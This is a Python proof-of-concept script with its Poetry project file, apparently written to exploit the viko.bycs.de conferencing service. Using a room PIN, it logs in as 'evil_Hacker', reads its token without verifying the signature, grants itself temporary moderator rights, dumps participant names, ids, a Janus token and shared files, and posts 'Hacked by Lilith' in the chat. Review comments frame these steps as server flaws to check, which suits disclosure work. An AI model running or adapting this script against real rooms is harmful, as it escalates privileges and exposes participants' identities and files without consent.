import requests | |
import uuid | |
from urllib.parse import urlparse | |
from websocket import create_connection | |
import json | |
import jwt | |
import sys | |
def get_jwt(authority_server='', room_id="", username="abc", user_session_id="", pin="0"):
    """Log ``username`` into a room and return the raw response body.

    Sends one POST to
    ``/api/fsm/admin/{room_id}/login/{user_session_id}/{pin}`` on
    ``authority_server`` with a hand-written multipart form that carries a
    single field, ``name``. The rest of this script treats the returned
    text as a JWT.

    Points a defender reviewing the endpoint should note, all visible in the
    request itself: the session id is chosen by the client, and the room PIN
    travels in the URL path, so it is recorded wherever request URLs are
    logged.

    Args:
        authority_server: Host name of the backend that serves the room.
        room_id: Identifier of the room to join.
        username: Display name placed in the ``name`` form field.
        user_session_id: Client-generated session identifier.
        pin: Room PIN, sent as the last path segment.

    Returns:
        The response body as text. The HTTP status is not checked.
    """
    login_url = f"https://{authority_server}/api/fsm/admin/{room_id}/login/{user_session_id}/{pin}"
    # The boundary in this body has to match the one announced in the
    # content-type header below, because the form is not built by requests.
    form_body = f"------WebKitFormBoundary5J7BrPSBB3hM3R9A\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n{username}\r\n------WebKitFormBoundary5J7BrPSBB3hM3R9A--\r\n"
    browser_headers = {
        "accept": "*/*",
        'authority': authority_server,
        "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5J7BrPSBB3hM3R9A",
        "sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"",
        "sec-ch-ua-mobile": "?0",
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "cross-site",
        "sec-gpc": "1"
    }
    return requests.post(login_url, headers=browser_headers, data=form_body).text
def get_video_config(room_id):
    """Fetch the video status document of a room from ``viko.bycs.de``.

    The GET request carries browser-like headers but no authorization
    header, so the server answers it for any caller that knows ``room_id``.
    The script later reads the ``fsm`` key of the result to learn which
    backend host serves the room.

    Args:
        room_id: Identifier of the room to look up.

    Returns:
        The decoded JSON body. The HTTP status is not checked.
    """
    status_url = f'https://viko.bycs.de/api/gateway/room/{room_id}/status/video'
    browser_headers = {
        'Connection': 'keep-alive',
        'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        'sec-ch-ua-mobile': '?0',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
        'content-type': 'application/json',
        'Accept': '*/*',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Dest': 'empty',
        'Referer': f'https://viko.bycs.de/app/raum/{room_id}',
        'Accept-Language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
        'dnt': '1',
        'sec-gpc': '1',
    }
    reply = requests.get(status_url, headers=browser_headers)
    return reply.json()
def get_files_shared(authority_server='', room_id=None, jwt=None):
    """Return the list of files shared in a room.

    Issues a GET to ``/api/fsm/room/{room_id}/file`` on ``authority_server``
    and authenticates with ``jwt`` as a bearer token.

    Inside this function the ``jwt`` parameter hides the ``jwt`` module
    imported at the top of the file. The module is not used here.

    Args:
        authority_server: Host name of the backend that serves the room.
        room_id: Identifier of the room whose files are listed.
        jwt: Token string sent in the ``authorization`` header. It must be a
            ``str``, because it is concatenated onto ``'Bearer '``.

    Returns:
        The decoded JSON body. The HTTP status is not checked.
    """
    files_url = f"https://{authority_server}/api/fsm/room/{room_id}/file"
    bearer = 'Bearer ' + jwt
    browser_headers = {
        'authority': authority_server,
        'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
        'sec-ch-ua-mobile': '?0',
        'authorization': bearer,
        'accept': '*/*',
        'origin': 'https://viko.bycs.de',
        'sec-fetch-site': 'cross-site',
        'sec-fetch-mode': 'cors',
        'sec-fetch-dest': 'empty',
        'referer': 'https://viko.bycs.de/',
        'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
        'dnt': '1',
        'sec-gpc': '1',
    }
    reply = requests.get(files_url, headers=browser_headers)
    return reply.json()
def make_mod(authority_server='', jwt="", room_id="", user_id=""):
    """Ask the backend to flag ``user_id`` as temporary moderator.

    Sends a POST with no body to
    ``/api/fsm/room/{room_id}/config/tempModerator/{user_id}/true`` and
    authenticates with ``jwt`` as a bearer token.

    NOTE(review): nothing on the client side shows whether the server
    checks that the holder of ``jwt`` already has moderator rights in the
    room. That check has to happen server-side. The script passes the
    ``jti`` claim of its own token as ``user_id``, so confirm against the
    server code how the role of the caller is verified.

    Inside this function the ``jwt`` parameter hides the ``jwt`` module
    imported at the top of the file. The module is not used here.

    Args:
        authority_server: Host name of the backend that serves the room.
        jwt: Token string sent in the ``authorization`` header.
        room_id: Identifier of the room.
        user_id: Identifier of the user to flag.

    Returns:
        The response body as text. The HTTP status is not checked.
    """
    moderator_url = f"https://{authority_server}/api/fsm/room/{room_id}/config/tempModerator/{user_id}/true"
    bearer = 'Bearer ' + jwt
    browser_headers = {
        'authority': authority_server,
        'content-length': '0',
        'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
        'sec-ch-ua-mobile': '?0',
        'authorization': bearer,
        'accept': '*/*',
        'origin': 'https://viko.bycs.de',
        'sec-fetch-site': 'cross-site',
        'sec-fetch-mode': 'cors',
        'sec-fetch-dest': 'empty',
        'referer': 'https://viko.bycs.de/',
        'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
        'dnt': '1',
        'sec-gpc': '1',
    }
    reply = requests.post(moderator_url, headers=browser_headers)
    return reply.text
# Room id and PIN are taken from the command line; the display name is fixed.
ROOM_ID = sys.argv[1]
PIN = sys.argv[2]
USERNAME = "evil_Hacker"

# The unauthenticated status document names the backend ("fsm") for the room.
video_config = get_video_config(ROOM_ID)
print(video_config)
server = urlparse(video_config["fsm"]).netloc

# The session id is generated on the client; the server is handed whatever
# value is produced here.
session_user_id = uuid.uuid4()

print("Our JWT:")
jwt_token = get_jwt(server, ROOM_ID, USERNAME, str(session_user_id), PIN)
print(jwt_token)

# Signature verification is switched off: the claims are only read to learn
# the id the server assigned ("jti"). Claims decoded this way are
# unauthenticated and must never drive a trust decision.
decoded_jwt = jwt.decode(
    jwt_token,
    options={"verify_signature": False},
    algorithms=["HS512"],
)
print(decoded_jwt)
ws_connection_id = decoded_jwt["jti"]

# Request the temporary-moderator flag for the id taken from our own token.
# Whether this is honoured depends entirely on the server-side role check.
print(make_mod(server, jwt_token, ROOM_ID, ws_connection_id))

# Application websocket of the conferencing backend (not the Janus media
# server); room id and connection id are part of the URL.
con = create_connection(f"wss://{server}/websockets/{ROOM_ID}/{ws_connection_id}")

# Auth frame assembled by plain string concatenation, so none of the values
# is JSON-escaped. sessionId and t are fresh random UUIDs.
auth_frame = (
    '{"type":"auth","name":"' + USERNAME
    + '","userId":"' + ws_connection_id
    + '","token":"' + jwt_token
    + '","sessionId":"' + str(uuid.uuid4())
    + '","t":"' + str(uuid.uuid4())
    + '","anon":false}'
)
con.send(auth_frame)
print(con.recv())

# The participants reply is read for a "token" field (labelled as the Janus
# token below) and for the user list with names and ids. Server-side, this
# payload should be limited to what the role of the caller may see.
con.send('{"request":"participants"}')
participants = json.loads(con.recv())

print(f"\nYour Janus Token is: {participants['token']} \n")

print(f"Users in the room:")
for u in participants["users"]:
    print(f"User:{u['name']} ({u['id']}) ")

print("\n-----------\n")
print("Dump: ")
print(participants)
print("\n-----------\n")

print("Files shared: ")
print(get_files_shared(authority_server=server, room_id=ROOM_ID, jwt=jwt_token))

# Post one chat message into the room and print the reply of the server.
con.send('{"request":"chatMessage","text":"Hacked by Lilith"}')
print(con.recv())
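[tool.poetry]
name = "csuhack"
version = "0.1.0"
description = ""
authors = ["Lilith Wittmann <mail@lilithwittmann.de>"]

[tool.poetry.dependencies]
python = "^3.7"
requests = "^2.25.1"
# NOTE(review): `websocket` and `websocket-client` are separate PyPI
# distributions that both appear to install a top-level `websocket` module.
# The accompanying script imports `create_connection` from `websocket`, which
# is the websocket-client API, so this entry looks unintended. Confirm which
# distribution is meant and keep only that one.
websocket = "^0.2.1"
websocket-client = "^1.1.0"
PyJWT = "^2.1.0"

[tool.poetry.dev-dependencies]

[build-system]
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"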